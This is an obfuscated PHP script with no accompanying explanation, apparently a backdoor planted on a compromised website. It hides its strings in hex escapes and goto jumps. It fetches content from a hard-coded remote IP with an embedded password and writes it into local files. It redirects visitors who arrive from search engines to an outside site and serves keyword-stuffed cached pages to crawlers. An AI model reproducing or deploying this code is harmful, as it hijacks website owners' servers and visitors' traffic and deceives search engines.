<?php
 goto OdDTu; kEh9T: $apass3 = "\x72\x76\x33\x32\x79\x64\x61\x63\x73\x76\163\x64\166"; goto R6AOK; NfnRq: if ($_GET["\x69\x64"] == "\x69\x6e\x64\145\x78") { header("\x4c\x6f\x63\x61\x74\x69\157\x6e\x3a\40\x68\164\164\x70\x73\x3a\x2f\57\x67\157\x6f\147\154\x65\x2e\143\x6f\x6d"); die; } goto N4nZI; nOvf2: $s = dirname($_SERVER["\x50\x48\120\137\123\x45\114\106"]); goto ciJE8; uzoSM: if (function_exists("\143\165\x72\x6c\137\151\x6e\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\x74\160\x3a\57\x2f\x31\x33\x35\x2e\61\70\61\x2e\x32\x31\x2e\61\x32\x36\57" . $_GET["\x66\x6e"] . "\x2e\x70\x68\x70\x3f\160\x61\163\x73\75{$apass}\x26\x71\75{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\x7a\151\154\x6c\x61\57\x34\56\x30\x20\50\x63\157\x6d\x70\141\164\151\x62\x6c\145\x3b\40\115\123\111\105\40\66\x2e\60\73\x20\127\151\x6e\x64\x6f\167\x73\x20\x4e\124\x20\65\x2e\x31\x3b\40\x53\126\61\51"); $text = curl_exec($ch); curl_close($ch); } goto NFF0B; ZEXJ1: if (strlen($text) > 5000) { $out = fopen("\x69\x6e\144\x65\x78\57" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto vlzrb; H1yCW: $_GET["\x66\156"] = "\66\x39\66\71\66\x39\156\145\x77"; goto lANRk; uXq0_: $s = $_SERVER["\123\x45\x52\126\105\x52\x5f\116\101\x4d\105"] . $s; goto kEh9T; NFF0B: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\164\160\72\x2f\x2f\x31\x33\x35\56\61\70\61\x2e\62\61\x2e\x31\x32\66\57" . $_GET["\x66\156"] . "\56\160\150\160\x3f\160\x61\x73\x73\x3d{$apass}\46\161\x3d{$_GET["\151\144"]}"); } goto yjeU1; ciJE8: if ($s == "\134" | $s == "\57") { $s = ''; } goto uXq0_; yjeU1: if (strlen($text) < 5000) { $url = "\61\x33\x35\x2e\61\x38\61\56\x32\x31\56\61\x32\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\x28{$errno}\51\x3c\x62\x72\x20\57\76\xa"; } else { $req = "\57" . $_GET["\146\156"] . "\x2e\x70\150\160\77\160\x61\163\163\x3d{$apass}\46\x71\x3d{$_GET["\x69\x64"]}"; $out = "\x47\105\124\40{$req}\40\110\124\x54\x50\57\x31\x2e\x30\xd\12"; $out .= "\x48\157\163\164\x3a\40{$url}\15\xa"; $out .= "\103\x6f\x6e\156\x65\x63\x74\151\x6f\156\72\x20\103\x6c\157\163\145\15\12\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto ZEXJ1; v4R7T: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\x69\144"]); goto HXtlm; OdDTu: error_reporting(0); goto gZKQf; lANRk: $apass1 = "\166\x69\x73\x64\157\151\152\x65\167"; goto u649A; LAhA0: if ($_GET["\151\144"] == "\164\145\163\x74\x69\x6e\147") { echo "\x74\x65\x73\x74\x20\147\x6f\157\x64\56\56\x2e"; die; } goto NfnRq; gZKQf: $today = "\x32\x30\x32\x35\x30\65\x32\x31\x2d"; goto SvCUv; SvCUv: foreach ($_GET as $a => $b) { $_GET["\x69\x64"] = $b; } goto LAhA0; RcdSb: $apass2 = "\142\x32\x33\x68\162\x32\63\166\x72\x33\x32"; goto nOvf2; KFuO7: $xx1 = 5; goto XBpAO; HI_Ip: if (strpos($_SERVER["\110\124\124\120\x5f\122\x45\106\105\x52\x45\122"], "\147\157\157\147\154\x65\x2e") or strpos($_SERVER["\x48\x54\124\120\x5f\122\105\106\105\122\105\x52"], "\171\x61\150\x6f\157\x2e") or strpos($_SERVER["\110\124\124\120\137\122\x45\x46\105\122\105\x52"], "\142\x69\156\x67\x2e")) { $tpl = "\151\x6e\144\145\170\x2f" . $_GET["\151\x64"] . "\x2e\x70\x68\160\x2e\x74\x70\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\x4c\x6f\143\141\x74\x69\157\156\x3a\x20\150\164\x74\160\163\72\x2f\x2f\143\150\160\x6f\153\x2e\x73\x69\164\x65\x2f\145\156\x74\x65\x72\57\77\155\141\162\x6b\75{$today}\x2d{$s}\46\164\x70\x6c\x3d{$tpl}\x26\x65\x6e\x67\x6b\x65\x79\75{$keyword}"); die; } else { $myname = $_GET["\151\x64"] . "\56\160\150\160"; if (file_exists("\x69\x6e\144\x65\170\x2f" . $myname)) { $html = @file_get_contents("\151\x6e\144\x65\170\57" . $myname); if (strpos($_SERVER["\x48\x54\124\120\137\x55\x53\x45\x52\x5f\x41\x47\105\116\x54"], "\x62\151\x6e\147") > 2 or strpos($_SERVER["\110\x54\124\x50\137\x55\x53\x45\x52\137\x41\x47\x45\116\124"], "\x79\x61\150\157\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\151\144"]); $html = str_replace("\x3c\x74\x69\x74\154\145\x3e\74\x2f\164\x69\x74\154\145\76", "\x3c\x74\151\x74\154\x65\x3e{$keyword}\x3c\x2f\x74\x69\164\154\145\x3e", $html); } echo $html; die; } } goto v4R7T; UOF9A: $keyword = str_replace("\x20", "\53", $keyword); goto RcdSb; N4nZI: $_GET["\x77\157\x72\154\144"] = 5; goto H1yCW; HXtlm: $text = ''; goto uzoSM; R6AOK: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto HI_Ip; XBpAO: $keyword = str_replace("\x2d", "\x20", $_GET["\x69\144"]); goto UOF9A; vlzrb: echo $text; goto xEUAA; u649A: $x1 = 3; goto KFuO7; xEUAA: ?>